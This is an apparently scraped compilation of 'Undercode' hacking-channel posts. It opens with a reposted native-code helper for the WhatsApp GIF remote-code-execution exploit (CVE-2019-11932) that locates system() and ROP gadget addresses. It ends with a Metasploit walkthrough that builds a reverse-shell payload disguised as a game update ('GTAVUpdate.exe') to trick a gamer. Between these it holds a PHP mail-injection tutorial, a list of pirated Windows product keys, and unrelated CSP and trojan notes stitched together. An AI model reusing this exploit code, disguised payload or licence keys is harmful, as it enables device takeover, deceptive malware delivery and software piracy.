▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The real lastest Whatsapp cve :


Finally uploaded

# Exploit Title: Whatsapp 2.19.216 - Remote Code Execution
# Date: 2019-10-16
# Exploit Author: Valerio Brussani (@val_brux)
# Vendor Homepage: https://www.whatsapp.com/
# Version: < 2.19.244
# Tested on: Whatsapp 2.19.216
# CVE: CVE-2019-11932
# Reference1: https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/
# Full Android App: https://github.com/valbrux/CVE-2019-11932-SupportApp
# Credits: all credits for the bug discovery goes to Awakened (https://awakened1712.github.io/hacking/hacking-whatsapp-gif-rce/)

/*
*
* Introduction
* This native code file aims to be complementary to the published Whatsapp GIF RCE exploit by Awakened , by calculating the system() function address and ROP gadget address for different types of devices, which then can be used to successfully exploit the vulnerability.
* The full Android application code is available at the following link https://github.com/valbrux/CVE-2019-11932-SupportApp
*
*/

#include <jni.h>
#include <string>
#include <dlfcn.h>
#include <link.h>

typedef uint8_t byte;
char *gadget_p;
void* libc,* lib;

//dls iteration for rop
int dl_callback(struct dl_phdr_info *info, size_t size, void *data)
{
int j;
const char *base = (const char *)info->dlpi_addr;
for (j = 0; j < info->dlpi_phnum; j++) {
const ElfW(Phdr) *phdr = &info->dlpi_phdr[j];
if (phdr->p_type == PT_LOAD && (strcmp("/system/lib64/libhwui.so",info->dlpi_name) == 0)) {
gadget_p = (char *) base + phdr->p_vaddr;
return 1;
}
}
return 0;
}

//system address
void* get_system_address(){
libc = dlopen("libc.so",RTLD_GLOBAL);
void* address = dlsym( libc, "system");
return address;
}

//rop gadget address
void get_gadget_lib_base_address() {
lib = dlopen("libhwui.so",RTLD_GLOBAL);
dl_iterate_phdr(dl_callback, NULL);
}

//search gadget
long search_for_gadget_offset() {
char *buffer;
long filelen;
char curChar;
long pos = 0; int curSearch = 0;
//reading file
FILE* fd = fopen("/system/lib64/libhwui.so","rb");
fseek(fd, 0, SEEK_END);
filelen = ftell(fd);
rewind(fd);
buffer = (char *)malloc((filelen+1)*sizeof(char));
fread(buffer, filelen, 1, fd);
fclose(fd);
//searching for bytes
byte g1[12] = {0x68, 0x0E, 0x40, 0xF9, 0x60, 0x82, 0x00, 0x91, 0x00, 0x01, 0x3F, 0xD6};
while(pos <= filelen){
curChar = buffer[pos];pos++;
if(curChar == g1[curSearch]){
curSearch++;
if(curSearch > 11){
curSearch = 0;
pos-=12;
break;
}
}
else{
curSearch = 0;
}
}
return pos;
}

extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getSystem(JNIEnv* env,jobject) {
char buff[30];
//system address
snprintf(buff, sizeof(buff), "%p", get_system_address());
dlclose(libc);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}



extern "C" JNIEXPORT jstring JNICALL Java_com_valbrux_myapplication_MainActivity_getROPGadget(JNIEnv* env,jobject) {
char buff[30];
get_gadget_lib_base_address();
//gadget address
snprintf(buff, sizeof(buff), "%p",gadget_p+search_for_gadget_offset());
dlclose(lib);
std::string system_string = buff;
return env->NewStringUTF(system_string.c_str());
}

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑New tip :
The Content-Security-Policy
1. How can I allow multiple sources?
You can simply list your sources after a directive as a space-separated list:
content="default-src 'self' https://example.com/js/"
Note that there are no quotes around parameters other than the special ones, like 'self'. Also, there's no colon (:) after the directive. Just the directive, then a space-separated list of parameters.
Everything below the specified parameters is implicitly allowed. That means that in the example above these would be valid sources:
https://example.com/js/file.js
https://example.com/js/subdir/anotherfile.js
These, however, would not be valid:
http://example.com/js/file.js
^^^^ wrong protocol

https://example.com/file.js
^^ above the specified path
2. How can I use different directives? What do they each do?
The most common directives are:
• default-src the default policy for loading javascript, images, CSS, fonts, AJAX requests, etc
• script-src defines valid sources for javascript files
• style-src defines valid sources for css files
• img-src defines valid sources for images
• connect-src defines valid targets for to XMLHttpRequest (AJAX), WebSockets or EventSource. If a connection attempt is made to a host that's not allowed here, the browser will emulate a 400 error
There are others, but these are the ones you're most likely to need.
3. How can I use multiple directives?
You define all your directives inside one meta-tag by terminating them with a semicolon (;):
content="default-src 'self' https://example.com/js/; style-src 'self'"
4. How can I handle ports?
Everything but the default ports needs to be allowed explicitly by adding the port number or an asterisk after the allowed domain:
content="default-src 'self' https://ajax.googleapis.com http://example.com:123/free/stuff/"
The above would result in:
https://ajax.googleapis.com:123
^^^^ Not ok, wrong port

https://ajax.googleapis.com - OK

http://example.com/free/stuff/file.js
^^ Not ok, only the port 123 is allowed

http://example.com:123/free/stuff/file.js - OK
As I mentioned, you can also use an asterisk to explicitly allow all ports:
content="default-src example.com:*"
5. How can I handle different protocols?
By default, only standard protocols are allowed. For example to allow WebSockets ws:// you will have to allow it explicitly:
content="default-src 'self'; connect-src ws:; style-src 'self'"
^^^ web Sockets are now allowed on all domains and ports.
6. How can I allow the file protocol file://?
If you'll try to define it as such it won’t work. Instead, you'll allow it with the filesystem parameter:
content="default-src filesystem"
7. How can I use inline scripts and style definitions?
Unless explicitly allowed, you can't use inline style definitions, code inside <script> tags or in tag properties like onclick. You allow them like so:
content="script-src 'unsafe-inline'; style-src 'unsafe-inline'"
You'll also have to explicitly allow inline, base64 encoded images:
content="img-src data:"
8. How can I allow eval()?
I'm sure many people would say that you don't, since 'eval is evil' and the most likely cause for the impending end of the world. Those people would be wrong. Sure, you can definitely punch major holes into your site's security with eval, but it has perfectly valid use cases. You just have to be smart about using it. You allow it like so:
content="script-src 'unsafe-eval'"
9. What exactly does 'self' mean?
You might take 'self' to mean localhost, local filesystem, or anything on the same host. It doesn't mean any of those. It means sources that have the same scheme (protocol), same host, and same port as the file the content policy is defined in. Serving your site over HTTP? No https for you then, unless you define it explicitly.

Unixforum
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑PHP mail injection practical exercise by Undercode :

1) Introduction

Today, the use of the Internet has risen sharply, but the vast majority of Internet users have no security knowledge background. Most people use the Internet to communicate with others via email. For this reason, most websites allow their users to contact them, provide suggestions to the website, report a problem, or request feedback, and the user will send the feedback to the website administrator’s email.

Unfortunately, most web developers don't have enough knowledge of Code-Security. Some of them use existing libraries or frameworks, which are subject to many known vulnerabilities. These vulnerabilities have been announced, and the manufacturers have patched them, and the corresponding attack source code poc is downloadable on the Internet, but most developers are too lazy to upgrade to the latest version.

Today we are going to talk about email injection, an attacker can use your mail server to send spam.

2) Email injection

E-mail injection is a security loophole, which is widely present in Internet email receiving and sending applications. This is similar to email injection and HTTP header injection. Similar to SQL injection attacks, this type of vulnerability is a common type of vulnerability that occurs when one programming language is embedded in another, such as MYSQL embedded in PHP.

When a form that can submit data to a web application is added to a web page, malicious users may use the MIME format to add additional information to the message to be sent (POST/GET), such as a new recipient list or A completely different message body. Because the MIME format uses carriage returns to separate the information in the data packet (there is a newline character between each line in the HTTP packet, and there are two newline characters between POST and HTTP HEADER), submit the form data by adding a carriage return ( It can be easily done using some plug-ins of FB), which allows a simple message board to be used to send thousands of messages. Similarly, a spammer can use this tactic to maliciously send a large number of anonymous messages.

Email injection is a type of attack against the built-in mail function of PHP. It allows malicious attackers to inject any email header fields, BCC, CC, subject, etc., and it allows hackers to send spam from the victim's mail server by injection. For this reason, this type of attack is called email injection, or spam in the form of mail. This vulnerability is not limited to PHP. It may affect any application that receives messages from the user UI and sends email messages. The main reason for this kind of attack is improper user input validation or the application has no authentication and filtering mechanism at all.

3) Third, the attack principle of email injection

The old Chinese saying goes well: Only by knowing it can you know why.

In order to explain the working principle of email injection, we must first understand the working principle of the PHP Email function. Below is the API explanation found in the PHP Manual


mail():
http://www.php.net/manual/en/function.mail.php
bool mail (string $to, string $subject, string $message [, string $additional_headers [, string $additional_parameters ]])
You can notice that this requires three required parameters ("Destination, Subject and Message") and some other optional parameters and the function returns a Boolean value.

https://pastebin.com/gfrEEmGa
NOW SEE THIS CODE :



first part

<?php
$to=" littlehann@foxmail.com ";
if (!isset($_POST["send"])){
?>
This code will check the form submission or not. The response of the user clicking the submit button and the script of normal visiting this page will be different. If this code returns True (the final result of the if statement is true), it means that the form is not submitted. The form will appear, waiting for user input. On the other hand, if it returns "False", it means that the form has been submitted, so the email will be sent.

the second part

<form method="POST" action="<?echo $_SERVER['PHP_SELF'];?>">
From: <input type="text" name="sender">
Subject: <input type="text" name ="subject">
Message:
<textarea name="message" rows="10" cols="60" lines="20"></textarea>
<input type="submit" name="send" value="Send ">
</form> The
second part is an HTML form tag, which requires user input.

MORE: https://pastebin.com/f8YAfm2P

🦑Fourth, mail injection demonstration

notice:

In order to use PHP as a mailing agent, we need to configure PHP.INI:

[mail function]
; For Win32 only
.; http://php.net/smtp
SMTP = smtp.qq.com
; http://php.net/smtp-port
smtp_port = 25
For demonstration purposes, we will use the previous The vulnerable code. In addition, we will submit the following values ​​as parameters for sending emails:

mail(" littlehann@foxmail.com ", "Call me urgent", "Hi,nPlease call me ASAP.nBye", "From: Test@UndercodeTesting.com ")
HTTP packet sent ...

🦑From the attacker's point of view, there are many additional fields that can be injected in the email header. See RFC 822 for more information. For example, CC (carbon copy) or BCC (blind copy) allows the attacker to insert more messages.

But it should be noted that before we add a new parameter, we must add a newline to separate each field. The hexadecimal value of the newline character is "0x0A"

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑PHP mail injection practical exercise by Undercode

Detailed fresh Proxies List

https://pastebin.com/EBpfH5iT

List of Windows 8.1 Product/Serial Keys 2019
GCRJD-8NW9H-F2CDX-CCM8D-9D6T9
334NH-RXG76-64THK-C7CKG-D3VPT
MHF9N-XY6XB-WVXMC-BTDCT-MKKG7
TT4HM-HN7YT-62K67-RGRQJ-JFFXW
FHQNR-XYXYC-8PMHT-TV4PH-DRQ3H
HMCNV-VVBFX-7HMBH-CTY9B-B4FXY
XHQ8N-C3MCJ-RQXB6-WCHYG-C9WKB
MNDGV-M6PKV-DV4DR-CYY8X-2YRXH
Windows 8.1 DVD Keys
KQWNF-XPMXP-HDK3M-GBV69-Y7RDH
MMRNH-BMB4F-87JR9-D72RY-MY2KV
N4WY8-DVW92-GM8WF-CG872-HH3G7
ND8P2-BD2PB-DD8HM-2926R-CRYQH
Windows 8.1 Ultimate Product Keys
NTTX3-RV7VB-T7X7F-WQYYY-9Y92F
Windows 8.1 Pro Product Key
3FCND-JTWFM-24VQ8-QXTMB-TXT67
GX9N8-4H2FH-D987T-BQ9GK-XKT67
KKPMN-469HY-H6V43-T8VX2-8W8XV
T3NJK-3P683-2T7BJ-2X27F-8B2KV
DNJXJ-7XBW8-2378T-X22TX-BKG7J
MBFBV-W3DP2-2MVKN-PJCQD-KKTF7
6RH4V-HNTWC-JQKG8-RFR3R-36498
4Y8N3-H7MMW-C76VJ-YD3XV-MBDKV
28VNV-HF42G-K2WM9-JXRJQ-2WBQW
Windows 8.1 Enterprise Keys
MHF9N-XY6XB-WVXMC-BTDCT-MKKG7
Windows 8.1 Serial Keys
TGXN4-BPPYC-TJYMH-3WXFK-4JMQH
N9C46-MKKKR-2TTT8-FJCJP-4RDG7
Q4NBQ-3DRJD-777XK-MJHDC-749T7
4NMMK-QJH7K-F38H2-FQJ24-2J8XV
84NRV-6CJR6-DBDXH-FYTBF-4X49V
D7KN2-CBVPG-BC7YC-9JDVJ-YPWXV
3NHJ7-3WWQK-4RFTH-8FHJY-PRYQH
988NM-XKXT9-7YFWH-H2Q3Q-C34DH
2VTNH-323J4-BWP98-TX9JR-FCWXV
Windows 8.1 (Core | Multiple Editions) Keys

Windows 10 Product Keys :

Windows 10 Professional Key W269N-WFGWX-YVC9B-4J6C9-T83GX

Windows 10 Professional N Product Key MH37W-N47XK-V7XM9-C7227-GCQG9

Windows 10 Enterprise Key NPPR9-FWDCX-D2C8J-H872K-2YT43

Windows 10 Enterprise N Key DPH2V-TTNVB-4X9Q3-TJR4H-KHJW4

(tested on 2019 Version)

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Apk error install fix :

Corrupted files

Not enough storage

Insufficient system permissions

Unsigned App

Incompatible version

Solving App Not Installed Error

Changing the app codes

Resetting the app preferences

Disabling Google Play protect

Avoid installation from the sd-cards

Clearing Data

Signing App

Unknown source installation

@UndercodeTesting
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Analytiques
a Trojan has been detected that can change proxy settings and intercept HTTPS traffic :

HOW IT WORK'S ?

1) Microsoft experts have warned about the emergence of a new Trojan capable of modifying proxy server settings, "listening" to encrypted traffic, stealing credentials, and other important information.

2) To spread the malware dubbed Trojan: JS / Certor.A., Cybercriminals usetraditional methods, in particular, spam mailing. Emails include a Microsoft Word document attachment that contains an embedded OLE object that runs a Jscript when opened. This script is disguised as a harmless file that does not arouse the user's suspicion. In fact, the code contains several PowerShell scripts and its own certificate, which is then used to monitor and intercept HTTPS traffic.

3) Once on the system, the malware modifies Internet Explorer proxy settings in the Windows registry and installs a Tor client, a task scheduler, a proxy tunneling utility,
and a certificate that allows attackers to listen to encrypted traffic. In addition, the Trojan installs another certificate for the Mozilla Firefox browser, since this Internet browser uses its own proxy settings.

4) Further, all traffic is redirected to a proxy server controlled by the attacker. As a result, they can remotely monitor, redirect, modify traffic and steal important victim data.

Don't copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑what is ipc$

1) IPC$ (Internet Process Connection) is a resource that shares "named pipes". It is a named pipe that is opened for inter-process communication.

2) By providing a trusted user name and password, both parties of the connection can establish a secure channel and proceed with this channel. Encrypted data exchange to achieve access to remote computers. IPC$ is a new feature of NT/2000. It has a feature that only one connection can be established between two IPs at the same time.

3) While NT/2000 provides the ipc$ function, it also opens the default sharing when the system is first installed, that is, all logical sharing (c$, d$, e$...) and the system directory winnt or windows (admin$) shared. All of these, Microsoft's original intention is to facilitate the management of administrators, but intentionally or unintentionally, leading to a reduction in system security.

4) We can always hear people talking about ipc$ loopholes and ipc$ loopholes. In fact, ipc$ is not a loophole in the real sense. I think the reason why some people say this must refer to the "backdoor" that Microsoft installed itself: empty Session (Null session).


▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑what is an empty session ?

Before introducing the empty session, we need to understand how a secure session is established.

In Windows NT 4.0, a challenge response protocol is used to establish a session with a remote machine. The successful session will become a secure tunnel through which the two parties can exchange information. The general sequence of this process is as follows:

1) The session requester (client) sends a data packet to the session receiver (server) to request the establishment of a secure tunnel;

2) The server generates a random 64-digit number (implementation challenge) and sends it back to the client;

3) The client obtains the 64-digit number generated by the server, disrupts it with the password of the account that is trying to establish a session, and returns the result to the server (response);

4) After the server accepts the response, it sends it to the local security authentication (LSA). The LSA verifies the response by using the user's correct password to confirm the identity of the requester. If the account of the requester is a local account of the server, the verification occurs locally; if the account requested is a domain account, the response is sent to the domain controller for verification. When the response to the challenge is verified as correct, an access token is generated and then sent to the client. The client uses this access token to connect to the resource on the server until the proposed session is terminated.

The above is a general process of establishing a secure session, but what about an empty session?

A null session is a session established with the server without trust (that is, the user name and password are not provided), but according to the WIN2000 access control model, the establishment of a null session also requires a token, but the null session is in the process of establishing It has not been authenticated by user information, so this token does not contain user information. Therefore, this session cannot allow the system to send encrypted information, but this does not mean that the token of the empty session does not contain the security identifier SID (it identifies For an empty session, the SID of the token provided by LSA is S-1-5-7, which is the SID of the empty session, and the user name is: ANONYMOUS LOGON

Your not allowed to copy our tutorials!
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Hack Windows 10 with Metasploit :

1) Create metasploit
Before creating the metasploit, we need to figure out what is our Kali Linux local IP.
For that, run

ip addr

or

ifconfig

2) Now let’s get hands dirty!
In the terminal run the follow command:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 –platform windows -f exe LHOST=192.168.195.72 LPORT=4444 -o /root/Desktop/GTAVUpdate.exe


3) The command above instructs msfvenom to generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload. The format must be specified as being type .exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our case, the LHOST is the IP address of our attacking Kali Linux machine that we got in the last command, and the LPORT is the port to listen on for a connection from the target once it has been compromised.
The name of the .exe is up to you. In this case I’ll be using GTAVUpdate.exe because our target will be a gamer that we know has GTA V.

4) Connection
We now need to set up a listener on the port we determined within the executable. We do this by launching Metasploit using the command msfconsole on the Kali Linux terminal

5) First, we’ll tell Metasploit to use the generic payload handler “multi/handler” using the command

use multi/handler

. We will then set the payload to match the one set within the executable using the command

set payload windows/meterpreter/reverse_tcp

. We will then set the LHOST and LPORT this way —

set LHOST 192.168.195.72

and set

LPORT 4444

. Once done, type

run

or ```exploit```and press Enter.

6) If everything’s ok type run or exploit
On the Windows machine you just need to access via the browser the IP/File.exe
In our case is 192.168.192.72/GTAVUpdate.exe

source https://medium.com/
▁ ▂ ▄ U𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁